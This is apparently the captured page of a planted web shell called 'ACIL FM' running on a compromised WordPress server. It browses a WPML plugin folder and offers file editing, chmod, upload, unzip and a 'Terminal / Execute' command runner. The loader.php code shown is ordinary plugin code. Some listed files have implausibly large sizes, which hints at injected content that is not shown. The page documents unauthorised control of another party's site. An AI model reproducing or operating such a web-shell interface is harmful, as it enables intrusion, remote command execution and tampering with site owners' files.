ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/vendor/otgs/icons
/
home
mhhtmff
www
site
wp-content
plugins
sitepress-multilingual-cms
vendor
otgs
icons
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
css
-
chmod
Open
Rename
Delete
fonts
-
chmod
Open
Rename
Delete
icons
-
chmod
Open
Rename
Delete
plugin-icons
-
chmod
Open
Rename
Delete
templates
-
chmod
Open
Rename
Delete
fantasticonrc.js
4.61 MB
chmod
View
DL
Edit
Rename
Delete
icons-overview.html
34.18 MB
chmod
View
DL
Edit
Rename
Delete
loader.php
1.53 MB
chmod
View
DL
Edit
Rename
Delete
otgs-icons.php
629 B
chmod
View
DL
Edit
Rename
Delete
README.md
573 B
chmod
View
DL
Edit
Rename
Delete
register.php
622 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/vendor/otgs/icons/loader.php
<?php /* * Load the shared OTGS icons library, on demand. * * ================= * Usage * ================= * $vendor_root_url = [ URL of the root of your relative vendor directory housing this repository ] * require_once( [ path to the root of your relative vendor directory housing this repository ] . '/otgs/icons/loader.php' ); * * ================= * Restrictions * ================= * - Assets are registered at init:10 * - Their handles are stored in constants that you can use as dependencies, on assets registered after init:10. */ if ( ! isset( $vendor_root_url ) ) { return; } /* * OTGS icons version - increase after every major update. */ $otg_icons_version = 104; /* * ================= * || WARNING || * ================= * * DO NOT EDIT below this line. */ global $otg_icons_versions; if ( ! isset( $otg_icons_versions ) ) { $otg_icons_versions = array(); } $otg_icons_versions[ $otg_icons_version ] = array( 'url' => $vendor_root_url . '/otgs/icons', 'path' => dirname( __FILE__ ) ); if ( ! has_action( 'init', 'otgs_icons_register' ) ) { add_action( 'init', 'otgs_icons_register' ); } if ( ! function_exists( 'otgs_icons_register' ) ) { function otgs_icons_register() { global $otg_icons_versions; $latest = 0; foreach ( $otg_icons_versions as $version => $root_utl ) { if ( $version > $latest ) { $latest = $version; } } require_once( $otg_icons_versions[ $latest ]['path'] . '/register.php' ); otgs_icons_register_assets( $otg_icons_versions[ $latest ], $latest ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply